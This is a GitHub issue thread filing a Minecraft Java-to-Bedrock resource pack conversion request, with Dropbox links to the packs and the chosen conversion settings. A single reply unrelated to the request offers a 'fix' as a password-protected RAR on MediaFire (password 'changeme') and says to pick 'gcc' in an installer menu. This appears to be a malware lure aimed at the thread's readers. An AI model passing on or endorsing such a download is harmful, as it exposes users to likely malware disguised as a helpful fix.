### ISSUE TITLE
[Pack]: Textures_Test_26/08

### ISSUE THREAD

**Issue by VeryEnergetic** [AZPixel-Team/Java2Bedrock#4545]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/4z65j88e6tibm3t3lrb9w/java_resources.zip?rlkey=lna220ahv40bjr0xlok28bpjo&st=yweae2g8&dl=0

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/mqe9gmiqvfjj2nu85o22u/bedrock_icons.zip?rlkey=96ynstr97hufl387k35sp8rk5&st=ue1d2cet&dl=0

### Default Assets Version

1.19.3

### Block Material

alpha_test

### Attachable Material

entity_alphatest_one_sided

### Archive Scratch Files

false

### Rename Model Files

false

### Font Conversion

None

### Armor Conversion

true

### Meg3 Fix

None

### Sounds Conversion

None

### Bow Conversion

true

### Shield Conversion

true

### Block Conversion

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
